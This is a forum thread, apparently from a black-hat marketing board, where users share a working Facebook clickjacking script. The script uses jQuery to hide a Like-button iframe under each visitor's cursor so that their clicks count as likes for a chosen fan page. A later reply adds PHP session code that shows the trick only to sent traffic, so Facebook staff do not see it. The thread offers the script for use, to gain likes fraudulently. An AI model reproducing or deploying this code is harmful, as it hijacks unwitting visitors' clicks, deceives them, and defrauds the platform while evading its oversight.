Looking for a Facebook ClickJack script

Status
Not open for further replies.
was this still working? i would like to try, pls PM me
 
ClickJack Script

Paste the Following piece of script above </head>

Code:
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.5.2/jquery.min.js" type="text/javascript">
</script>


      <script type="text/javascript">
         function ClickJackFbHide(){


            jQuery("div[id^=\'clickjack-button-wrapper\']").hide();


         }


         function ClickJackFbShow(){


            jQuery("div[id^=\'clickjack-button-wrapper\']").show();


         }


    
</script>

Paste this script just above </body>

Code:
<div id="clickjack-button-wrapper-5" style="position: absolute; opacity: 0; filter: alpha(opacity = 0); -ms-filter:'progid:DXImageTransform.Microsoft.Alpha(Opacity=0)';  margin-left: -50px; z-index: 100; width:27px; height:20px; overflow:hidden"> 


<!--<div class="clickjack-mask" style="position: absolute; top: 5px; left: 5px; z-index: 1000; height: 13px; width: 15px;"></div>-->


<iframe src="http://www.facebook.com/plugins/like.php?href=Replace Your facebook fanpage url&layout=button_count&show_faces=false&width=50&action=like&colorscheme=light&height=21" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:45px; left:-19px; height:21px; z-index: 0; position: relative;" allowTransparency="true"></iframe> 


   </div> 


   <script type="text/javascript"> 


      jQuery( document ).ready( function() {


          $( "#clickjack-button-wrapper-5" ).parent().mousemove( function( e ) {






            jQuery( "#clickjack-button-wrapper-5" ).css( {


               top: e.pageY - 10,


               left: e.pageX + 30


            } );


         } );






                        clickjack_hider();


                        var clickjack_fb_timer = setTimeout("clickjack_hider()",5000);


      } );


                        function clickjack_hider(){


         jQuery("input").mouseout(function(){ClickJackFbShow();});


         jQuery("a").mouseout(function(){ClickJackFbShow();});


         jQuery("button").mouseout(function(){ClickJackFbShow();});


         jQuery("textarea").mouseout(function(){ClickJackFbShow();});


         jQuery(".ratingblock").mouseout(function(){ClickJackFbShow();});         jQuery("object").mouseout(function(){ClickJackFbShow();});






         jQuery("input").mouseover(function(){ClickJackFbHide();});


         jQuery("a").mouseover(function(){ClickJackFbHide();});


         jQuery("button").mouseover(function(){ClickJackFbHide();});


         jQuery("textarea").mouseover(function(){ClickJackFbHide();});


         jQuery(".ratingblock").mouseover(function(){ClickJackFbHide();});         jQuery("object").mouseover(function(){ClickJackFbHide();});


                        }


   </script>

From This you can get 100 likes daily, no need to send promotion links to your friends and pages!
Replace the red line with your facebook fan page :- http://www.facebook.com/yourpage
Enjoy Tips!

dont forget to add cloaking
 
Here is one way you can cloak it so facebook employees can't see it. You will have two pages: lander.php (where you will send traffic) and mainpage.php (where your clickjack script will be).

put this in your lander.php:
Code:
<?php
session_start();
$_SESSION['clickjack'] = 1;
header("Location: http://yoursite.com/mainpage.php" );
?>

put this at the top of your mainpage.php:
Code:
<?php session_start(); ?>

then, further down the page where you want to add your clickjacking script put this:
Code:
<?php if(isset($_SESSION['clickjack'])){ ?>
<!--put your clickjack html here -->
<?php } ?>

then you will send your traffic to lander.php. All traffic sent to lander.php will be clickjacked.
 
Last edited:
So, it still works ? You are risking your page, I guess.
 
Here is one way you can cloak it so facebook employees can't see it. You will have two pages: lander.php (where you will send traffic) and mainpage.php (where your clickjack script will be).

put this in your lander.php:
Code:
<?php
session_start();
$_SESSION['clickjack'] = 1;
header("Location: yoursite.com/mainpage.php" );
?>

put this at the top of your mainpage.php:
Code:
<?php session_start(); ?>

then, further down the page where you want to add your clickjacking script put this:
Code:
<?php if(isset($_SESSION['clickjack'])){ ?>
<!--put your clickjack html here -->
<?php } ?>

then you will send your traffic to lander.php. All traffic sent to lander.php will be clickjacked.

It's not working for me. I'll just leave it uncloaked.
 
Status
Not open for further replies.
Back
Top